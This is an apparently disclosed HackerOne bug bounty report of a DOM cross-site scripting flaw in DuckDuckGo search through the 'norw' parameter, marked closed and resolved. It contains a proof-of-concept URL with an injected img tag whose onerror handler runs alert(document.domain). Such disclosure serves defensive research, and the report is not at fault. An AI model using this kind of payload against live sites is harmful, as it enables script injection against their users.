DOM XSS on duckduckgo.com search
High
Vulnerability Details
Hello,
The is a DOM XSS vulnerability on https://duckduckgo.com search through the ```norw``` parameter.
PoC URL: ```https://duckduckgo.com/?q=a&norw="><img src=/ onerror=alert(document.domain)>```
Screenshot: {F820482}
## Impact
The attacker can execute JS code.
Actions
View on HackerOneReport Stats
- Report ID: 868934
- State: Closed
- Substate: resolved
- Upvotes: 319